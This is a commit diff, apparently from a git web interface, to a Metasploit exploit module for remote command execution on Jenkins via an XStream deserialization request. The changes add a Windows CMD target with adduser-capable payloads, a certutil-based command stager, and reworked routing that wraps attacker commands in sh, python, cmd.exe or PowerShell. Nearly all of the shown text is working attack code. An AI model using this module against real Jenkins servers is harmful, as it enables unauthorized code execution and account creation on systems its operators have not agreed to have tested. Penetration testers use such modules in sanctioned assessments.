Add ARCH_CMD and general fixup
parent
1c156c3d3c
commit
2939695991
|
@ -47,6 +47,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X86, ARCH_X64]
|
||||
],
|
||||
['Windows (CMD)',
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_CMD],
|
||||
'Payload' => {
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'adduser, generic'
|
||||
}
|
||||
}
|
||||
],
|
||||
['Linux (Dropper)',
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X64]
|
||||
|
@ -62,7 +72,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
register_options([
|
||||
OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
|
||||
OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
|
||||
OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for connect back", 30]),
|
||||
Opt::RPORT('8080')
|
||||
])
|
||||
deregister_options('URIPATH')
|
||||
|
@ -88,22 +97,25 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
case target.name
|
||||
when /Unix/, /Python/, /PowerShell/
|
||||
when /Unix/, /Python/, /CMD/
|
||||
execute_command(payload.encoded)
|
||||
when /PowerShell/
|
||||
execute_command(payload.encoded)
|
||||
wait_for_session
|
||||
else
|
||||
execute_cmdstager
|
||||
execute_cmdstager({:flavor => :certutil})
|
||||
wait_for_session
|
||||
end
|
||||
end
|
||||
|
||||
# Exploit methods
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
cmd = case target.name
|
||||
when /Unix/, /Linux/
|
||||
%W{/bin/sh -c #{cmd}}
|
||||
when /Python/
|
||||
%W{python -c #{cmd}}
|
||||
when /Windows/
|
||||
when /Windows/, /CMD/
|
||||
%W{cmd.exe /c #{cmd}}
|
||||
when /PowerShell/
|
||||
psh_opts = { :remove_comspec => true, :wrap_double_quotes => true }
|
||||
|
@ -120,10 +132,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'ctype' => 'application/xml',
|
||||
'data' => xstream_payload(cmd)
|
||||
)
|
||||
wait_for_powershell_session
|
||||
end
|
||||
|
||||
def wait_for_powershell_session
|
||||
def wait_for_session
|
||||
print_status "Waiting for exploit to complete..."
|
||||
begin
|
||||
Timeout.timeout(datastore['ListenerTimeout']) do
|
||||
|
|
Loading…
Reference in New Issue